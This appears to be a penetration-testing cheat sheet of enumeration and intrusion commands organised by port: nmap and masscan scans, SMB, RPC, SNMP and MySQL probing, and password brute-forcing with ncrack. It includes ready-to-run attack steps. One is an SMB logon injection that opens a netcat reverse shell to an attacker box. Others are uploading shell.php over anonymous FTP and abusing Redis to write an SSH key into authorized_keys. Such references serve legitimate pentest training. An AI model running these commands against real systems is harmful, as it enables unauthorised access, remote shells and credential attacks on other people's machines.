Enumeration
​
Port Scanning :
1
nmap -sC -sV -o nmap -A -T5 10.10.10.x
2
​
3
Host Discovery
4
β€’ nmap -sn 10.10.1.1-254 -vv -oA hosts
5
β€’ netdiscover -r 10.10.10.0/24
6
​
7
DNS server discovery
8
β€’ nmap -p 53 10.10.10.1-254 -vv -oA dcs
9
10
NSE Scripts Scan
11
* nmap -sV --script=vulscan/vulscan.nse (https://securitytrails.com/blog/nmap-vulnerability-scan)
12
13
Port specific NSE script list :
14
​
15
ls /usr/share/nmap/scripts/ssh*
16
ls /usr/share/nmap/scripts/smb*
Copied!
Scanning all 65535 ports :
1
masscan -p1-65535,U:1-65535 --rate=1000 10.10.10.x -e tun0 > ports
2
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
3
nmap -Pn -sV -sC -p$ports 10.10.10.x
4
​
5
Running specific NSE scripts :
6
nmap -Pn -sC -sV --script=vuln*.nse -p$ports 10.10.10.x -T5 -A
Copied!
sC - default scripts, sV - scan for versions, oA- output all formats
Optional - sT (performs full scan instead of syn-scan to prevent getting flagged by firewalls)
From Apache Version to finding Ubuntu version -> ubuntu httpd versions
FTP : (Port 21)
    anonymous login check
      ftp <ip address>
      username : anonymous
      pwd : anonymous
      file upload -> put shell.php
SSH : (Port 22)
id_rsa.pub : Public key that can be used in authorized_keys for login
id_rsa : Private key that is used for login. Might ask for password. can be cracked with ssh2john and john
    id_rsa
    ssh -i id_rsa [email protected]
    For passwordless login, add id_rsa.pub to target's authorized_keys
    ssh2john
DNS Zone transfer check : (Port 53)
RPC Bind (111)
1
rpcclient --user="" --command=enumprivs -N 10.10.10.10
2
rpcinfo –p 10.10.10.10
3
rpcbind -p 10.10.10.10
Copied!
RPC (135)
1
rpcdump.py 10.11.1.121 -p 135
2
rpcdump.py 10.11.1.121 -p 135 | grep ncacn_np // get pipe names
3
​
4
rpcmap.py ncacn_ip_tcp:10.11.1.121[135]
Copied!
SMB (139 & 445)
1
nmap --script smb-protocols 10.10.10.10
2
​
3
smbclient -L //10.10.10.10
4
smbclient -L //10.10.10.10 -N // No password (SMB Null session)
5
smbclient --no-pass -L 10.10.10.10
6
smbclient //10.10.10.10/share_name
7
​
8
smbmap -H 10.10.10.10
9
smbmap -H 10.10.10.10 -u '' -p ''
10
smbmap -H 10.10.10.10 -s share_name
11
​
12
crackmapexec smb 10.10.10.10 -u '' -p '' --shares
13
crackmapexec smb 10.10.10.10 -u 'sa' -p '' --shares
14
crackmapexec smb 10.10.10.10 -u 'sa' -p 'sa' --shares
15
crackmapexec smb 10.10.10.10 -u '' -p '' --share share_name
16
​
17
enum4linux -a 10.10.10.10
18
​
19
rpcclient -U "" 10.10.10.10
20
* enumdomusers
21
* enumdomgroups
22
* queryuser [rid]
23
* getdompwinfo
24
* getusrdompwinfo [rid]
25
​
26
ncrack -u username -P rockyou.txt -T 5 10.10.10.10 -p smb -v
27
​
28
mount -t cifs "//10.1.1.1/share/" /mnt/wins
29
​
30
mount -t cifs "//10.1.1.1/share/" /mnt/wins -o vers=1.0,user=root,uid=0,gid=0
31
​
32
SMB Shell to Reverse Shell :
33
​
34
smbclient -U "username%password" //192.168.0.116/sharename
35
smb> logon β€œ/=nc β€˜attack box ip’ 4444 -e /bin/bash"
36
37
Checklist :
38
* Samba symlink directory traversal attack
Copied!
SMB Exploits :
SNMP (161)
    1
    snmpwalk -c public -v1 10.0.0.0
    2
    snmpcheck -t 192.168.1.X -c public
    3
    onesixtyone -c names -i hosts
    4
    nmap -sT -p 161 192.168.X.X -oG snmp_results.txt
    5
    snmpenum -t 192.168.1.X
    Copied!
IRC (194,6667,6660-7000)
NFS (2049)
MYSQL (3306)
    nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
Redis (6379)
In the output of config get * you could find the home of the redis user (usually /var/lib/redis or /home/redis/.ssh), and knowing this you know where you can write the authenticated_users file to access via ssh with the user redis. If you know the home of other valid user where you have writable permissions you can also abuse it:
    1.
    Generate a ssh public-private key pair on your pc: ssh-keygen -t rsa
    2.
    Write the public key to a file : (echo -e "\n\n"; cat ./.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt
    3.
    Import the file into redis : cat foo.txt | redis-cli -h 10.10.10.10 -x set crackit
    4.
    Save the public key to the authorized_keys file on redis server:
1
[email protected]:~# redis-cli -h 10.85.0.52
2
10.85.0.52:6379> config set dir /home/test/.ssh/
3
OK
4
10.85.0.52:6379> config set dbfilename "authorized_keys"
5
OK
6
10.85.0.52:6379> save
7
OK
Copied!
Port Knocking :
1
TCP
2
knock -v 192.168.0.116 4 27391 159
3
​
4
UDP
5
knock -v 192.168.0.116 4 27391 159 -u
6
​
7
TCP & UDP
8
knock -v 192.168.1.111 159:udp 27391:tcp 4:udp
Copied!
Misc :
IF NOTHING WORKS
Last modified 5mo ago
Copy link